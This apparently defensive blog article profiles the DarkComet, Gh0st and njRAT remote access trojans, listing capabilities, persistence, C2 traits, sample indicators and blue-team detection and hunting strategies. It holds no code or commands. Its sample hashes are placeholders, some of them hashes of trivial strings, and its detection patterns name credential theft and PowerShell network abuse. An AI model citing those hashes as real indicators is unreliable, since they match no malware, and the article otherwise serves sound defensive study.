Case Studies: Remote Access Trojans (RATs) Darkcomet , Gh0st and njRAT

CyberDefender 8 mins0

1. DarkComet RAT

Overview

  • Author: Jean-Pierre Lesueur
  • Era: ~2008–2015
  • Victims: Individuals, activists, enterprises, governments
  • Notable Use: Surveillance during the Arab Spring

DarkComet was originally marketed as a “remote administration tool” but became one of the most abused RATs due to its ease of use and rich spying features.

Infection Vector

  • Phishing emails with:
    • Malicious EXE
    • ZIP/RAR attachments
  • Trojanized software
  • USB propagation

Capabilities

  • Full remote desktop control
  • Keylogging
  • Webcam & microphone access
  • File manager
  • Credential theft
  • Registry editing
  • DDoS module

Persistence Mechanisms

  • Registry Run keys
  • Startup folder
  • Copy to %APPDATA% or %TEMP%

C2 Communication

  • Custom TCP protocol
  • Configured static IP/domain
  • Optional password-protected C2

Representative IOCs (DarkComet)

File-Based

TypeExample
File Namesvchost.exe, server.exe
File Path%APPDATA%\Microsoft\svchost.exe
Hash (Example)5f4dcc3b5aa765d61d8327deb882cf99

Registry

Key
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DarkComet

Network

IndicatorExample
Port1604 TCP
User-AgentNone / Custom
TrafficLong-lived TCP sessions

2. Gh0st RAT

Overview

  • Origin: China
  • Era: ~2008–Present (variants)
  • Victims: Governments, defense, NGOs
  • Associated With: Cyber-espionage / APT activity

Gh0st RAT is known for its modular architecture and use in targeted espionage campaigns.

Infection Vector

  • Spear-phishing with malicious documents
  • Exploits (older campaigns)
  • Trojanized installers

Capabilities

  • Live screen viewing
  • Audio surveillance
  • Keystroke logging
  • File exfiltration
  • Process management
  • Proxy tunneling

Persistence Mechanisms

  • Windows services
  • Registry autoruns
  • DLL side-loading

C2 Communication

  • Encrypted TCP
  • Often uses port 80/443 to blend in
  • Custom binary protocol

Representative IOCs (Gh0st RAT)

File-Based

TypeExample
File Namemsupdate.exe, svhost.dll
Path%SYSTEM32%\msupdate.exe
Hash (Example)d41d8cd98f00b204e9800998ecf8427e

Registry

Key
HKLM\SYSTEM\CurrentControlSet\Services\msupdate

Network

IndicatorExample
C2 Port80, 443
Traffic PatternEncrypted binary blobs
BeaconingLow and stealthy

3. njRAT (a.k.a. Bladabindi)

Overview

  • Origin: Middle East (commonly attributed)
  • Era: ~2013–Present
  • Victims: SMBs, individuals, enterprises
  • Notable Trait: Massive scale & automation

njRAT is one of the most widespread commodity RATs, often used in financially motivated campaigns.

Infection Vector

  • Phishing emails
  • Fake software cracks
  • Drive-by downloads
  • Social media file sharing

Capabilities

  • Remote shell
  • Credential dumping
  • Keylogging
  • Screenshot capture
  • File upload/download
  • USB spreading

Persistence Mechanisms

  • Registry Run keys
  • Scheduled Tasks
  • Copy to %APPDATA%

C2 Communication

  • HTTP
  • Dynamic DNS (No-IP, DuckDNS)
  • Base64-encoded traffic

Representative IOCs (njRAT)

File-Based

TypeExample
File Nameserver.exe, winlogon.exe
Path%APPDATA%\Roaming\Microsoft\winlogon.exe
Hash (Example)e99a18c428cb38d5f260853678922e03

Registry

Key
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\njRAT

Network

IndicatorExample
Domainexample.ddns.net
HTTP PatternPOST /index.php
DataBase64 blobs

4. MITRE ATT&CK Mapping (Common Across All)

TacticTechnique
Initial AccessPhishing Attachment (T1566.001)
PersistenceRegistry Run Keys (T1547.001)
Privilege EscalationCredential Dumping (T1003)
Defense EvasionObfuscated Files (T1027)
C2Web Protocols (T1071.001)
ExfiltrationOver C2 Channel (T1041)

5. SOC Detection & Hunting Tips

Endpoint

  • Look for unsigned binaries with outbound connections
  • Monitor registry autoruns
  • Detect keylogging APIs

Network

  • Identify periodic beaconing
  • Alert on Dynamic DNS usage
  • TLS inspection for anomalous certs

6. Comparative Summary Table

FeatureDarkCometGh0st RATnjRAT
TargetingBroadTargeted/APTMass-scale
C2TCPEncrypted TCPHTTP
PersistenceRegistryServicesRegistry/Tasks
Key FeatureWebcam spyingEspionageAutomation
Skill LevelLow–MediumHighLow
Usage TodayRareModified variantsStill common

Why Static IOCs Alone Are Insufficient

IOC TypeWhy It Fails
File HashChanges per compilation
File NameRandomized
IP AddressFast-flux / VPS rotation
DomainDynamic DNS / DGA
Registry KeyRandomized paths
User-AgentEasily spoofed

Static IOCs = tactical, not strategic detection

Modern RAT Detection Strategy (Layered)

1. Behavioral Detection (Most Important)

Behavioral detection focuses on what malware does, not how it looks.

Key RAT Behaviors

BehaviorExample
Persistence CreationRegistry Run keys, tasks
KeyloggingKeyboard hooks
Screen CaptureGDI / DirectX abuse
Credential AccessLSASS access
Process InjectionWriteProcessMemory
BeaconingRegular outbound traffic
LOLbin AbusePowerShell, rundll32

Example Behavioral Signals

  • Non-UI process capturing screenshots
  • Office app spawning PowerShell → network
  • Unsigned process injecting into explorer.exe

➡️ Resilient against recompilation

2. Threat Hunting (Proactive)

Threat hunting assumes compromise may already exist.

RAT-Focused Hunting Hypotheses

HypothesisHunt Idea
RAT persistence existsSearch autoruns
RAT beaconing presentFind periodic traffic
RAT in memoryLook for injected code
RAT stole credsLSASS access events
RAT lateral movementSMB/RDP anomalies

Example Hunt Queries (Conceptual)

  • Processes with:
    • Network access + no disk file
    • Unsigned + long runtime
  • Scheduled tasks with random names
  • Outbound connections to Dynamic DNS

➡️ Finds unknown & custom RATs

3. EDR Telemetry (High-Fidelity)

EDR provides deep visibility across endpoints.

Key Telemetry Sources

TelemetryValue
Process CreationParent-child anomalies
Command LineObfuscation detection
MemoryInjection indicators
File WritesSuspicious locations
RegistryAutorun creation
NetworkPer-process traffic

RAT Detection via EDR

SignalWhy It Matters
Office → Script → NetworkClassic RAT loader
svchost.exe outboundSuspicious
Unsigned service installPersistence
API hookingKeylogging

➡️ EDR correlates events across time

4. Threat Intelligence Correlation

Threat intelligence adds context, not just IOCs.

What to Correlate

Intelligence TypeUsage
Known TTPsMap behavior to malware families
Infrastructure PatternsHosting providers
Campaign ContextWho/why targeting
Malware LineageRAT variants
TimingActive campaigns

Example Correlation

  • Behavioral pattern matches njRAT
  • Domain registered recently + Dynamic DNS
  • Hosting in known bulletproof ASN
  • Matches MITRE techniques used by njRAT

➡️ Turns signals into attribution & confidence

How These Four Work Together (Example)

Scenario

  • No known hash
  • No known domain

Detection Flow

  1. Behavioral Detection
    • Registry Run key created
    • Keylogging APIs used
  2. EDR Telemetry
    • Process injected into explorer.exe
    • Periodic HTTPS beacons
  3. Threat Hunting
    • Find similar persistence across hosts
  4. Threat Intelligence
    • Behavior maps to commodity RAT family

➡️ Detection succeeds without static IOCs

Detection Maturity Comparison

ApproachEffectiveness
Static IOCs OnlyLow
IOCs + AVLimited
Behavioral + EDRHigh
Hunting + TI + EDRVery High

Recommended Blue-Team RAT Defense Model

LayerAction
EndpointEDR with behavior rules
NetworkBeaconing & DNS analytics
IdentityMFA & credential monitoring
SOCContinuous hunting
IntelTTP-focused feeds

CyberDefender